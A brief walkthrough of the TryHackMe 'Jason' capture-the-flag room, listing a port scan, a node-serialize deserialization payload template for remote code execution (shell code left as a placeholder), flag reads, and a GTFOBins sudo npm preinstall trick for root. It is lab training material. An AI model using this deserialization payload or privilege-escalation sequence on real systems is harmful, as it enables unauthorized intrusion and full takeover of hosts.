TryHackMe Jason
We are Horror LLC TryHackMe Jason, we specialize in horror, but one of the scarier aspects of our company is our front-end webserver. We can’t launch our site in its current state and our level of concern regarding our cybersecurity is growing exponentially. We ask that you perform a thorough penetration test and try to compromise the root account. There are no rules for this engagement. Good luck!
In JavaScript everything is a terrible mistake.Thanks to @Luma for testing the room.
Scan the machine
rustscan -a 10.10.44.51
Investigate Web server
firefox http://10.10.44.51
[adinserter block=”4″]
Analise Source Code
Investigate Requests
[adinserter block=”4″]10.10.82.11
Get a reverse Shell
{"rce":"_$$ND_FUNC$$_function (){ 'nodejsshell_code' }()"}
Get User Flag
cat /home/dylan/user.txt
Escalate Privileges
Search for npm on GTFO Bins and we have
export TERM=xterm
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i
Get Root Flag
cat /root/root.txt
Comments